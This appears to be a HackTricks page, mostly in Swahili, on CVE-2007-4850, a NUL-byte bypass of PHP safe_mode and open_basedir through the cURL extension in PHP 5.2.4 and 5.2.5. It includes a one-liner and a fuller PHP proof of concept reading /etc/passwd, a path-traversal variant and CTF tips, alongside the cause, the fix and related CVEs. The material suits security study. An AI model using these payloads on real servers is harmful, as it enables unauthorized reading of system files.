PHP 5.2.4 and 5.2.5 PHP cURL

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Ukurasa huu unaelezea mbinu ya zamani lakini bado muhimu katika CTFs/installs za kienyeji za urithi ya kuepuka ukaguzi wa PHP safe_mode/open_basedir kwa kutumia extension ya cURL kwenye matoleo fulani ya PHP 5.2.x.

• Waliokumbwa: PHP 5.2.4 na 5.2.5 zikiwa na ext/curl imewezeshwa.
• Athari: Kusoma faili za ndani kwa hiari licha ya vikwazo vya safe_mode au open_basedir (hakuna utekelezaji wa msimbo moja kwa moja).
• ID: CVE-2007-4850.

Chanzo: http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

One-liner PoC

Ikiwa safe_mode au open_basedir ziko hai na cURL imewezeshwa, yafuatayo yatarudisha yaliyomo ya script ya sasa:

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));

PoC ya wazi zaidi (arbitrary file read)

<?php
// Preconditions (legacy): PHP 5.2.4/5.2.5, safe_mode or open_basedir enabled, ext/curl loaded
$target = '/etc/passwd'; // change to the file you want to read
$ch = curl_init();
// The trick is the NUL byte (\x00). Prefix can be any string; checks are confused and the file after the NUL is read.
curl_setopt($ch, CURLOPT_URL, 'file://prefix'.chr(0).$target);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$resp = curl_exec($ch);
$err  = curl_error($ch);
curl_close($ch);
if ($resp !== false) {
echo $resp; // should contain the target file
} else {
echo "cURL error: $err\n";
}
?>

Vidokezo:

• Tumia nukuu mbili au chr(0) kuingiza NUL byte halisi. Percent-encoding (%00) haitafanya kazi kwa kuaminika.
• Hii ni file read primitive. Changanya na primitives nyingine (log poisoning, session file inclusion, etc.) kwa escalation zaidi inapowezekana.

Kwa nini hii inafanya kazi (mfupi)

Udhaifu upo katika jinsi PHP 5.2.4/5.2.5 ilivyofanya ukaguzi wa safe_mode/open_basedir kwa file:// URLs katika ext/curl. Ukaguzi ulitafsiri URL na kuthibitisha sehemu ya path, lakini kutokana na jinsi NUL-byte ilivyoshughulikiwa ilithibitisha kamba tofauti na ile iliyotumika na libcurl. Kwa vitendo, validator inaweza kuidhinisha path iliyopo baada ya NUL wakati libcurl ilitumia sehemu kabla ya NUL kama kontena ya URL, kuruhusu bypass inayosababisha kusomwa kwa faili iliyowekwa baada ya NUL byte. Angalia uchambuzi wa awali na macro iathiriwa katika curl/interface.c kwa maelezo. [CVE-2007-4850].

Vizuizi na marekebisho

• Imerekebishwa katika 5.2.x za baadaye (mf. distro builds patched to 5.2.6) kwa kurekebisha parsing/validation katika ext/curl.
• Inagusa tu deployments za zamani sana za PHP; safe_mode iliondolewa katika PHP 5.4 na modern builds hazionyeshi tabia hii.

Bypasses za kihistoria za cURL

• CVE-2006-2563 (PHP 4.4.2/5.1.4): libcurl wrappers ziliruhusu upatikanaji wa file:// zenye embedded NULs kutoroka open_basedir; ilirekebishwa kabla ya 5.2.x.
• PHP bugs #30609/#36223 zilifuatilia masuala ya awali ya cURL open_basedir ikitumia file:// bila canonicalization. Ukaguzi wowote kabla ya NUL byte au bila realpath-style resolution unakabiliwa na kukatwa sawa.

Vidokezo vya CTF

• Unapotambua PHP 5.2.4/5.2.5 ikiwa ext/curl imepakiwa (tazama cURL support => enabled katika phpinfo() na the exact PHP Version), hila hii kwa kawaida inafanya kazi hata kama allow_url_fopen imezimwa kwa sababu ext/curl inashughulikia file:// yenyewe.
• Ikiwa direct paths zinalindwa, jaribu relative traversal baada ya NUL, e.g. file://x\x00../../../../etc/passwd. The traversal inatatuliwa na libcurl, sio na mlinzi wa open_basedir.
• Unaweza kuzungusha payload katika single HTTP request body ili kusababisha the LFI kupitia vulnerable server-side code inayorudisha user-controlled URLs ndani ya curl_exec() (common katika legacy SSRF-like endpoints).

Angalia pia

Other disable_functions/open_basedir bypasses and modern techniques are collected here:

HackTricks

References

• Ubuntu CVE entry with patch pointers and affected versions
• Technical writeup with code context (cxsecurity)
• PHP bug #36223 (curl bypasses open_basedir)
• CVE-2006-2563 cURL PHP File Access Bypass (earlier NUL-byte issue)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.